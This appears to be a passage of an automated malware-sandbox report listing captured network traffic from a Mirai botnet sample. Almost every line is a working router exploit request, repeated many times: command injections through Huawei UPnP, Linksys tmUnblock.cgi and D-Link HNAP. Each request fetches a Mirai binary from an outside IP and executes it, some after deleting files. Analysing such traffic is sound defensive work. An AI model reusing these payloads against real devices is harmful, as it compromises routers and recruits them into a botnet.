65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POSTData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 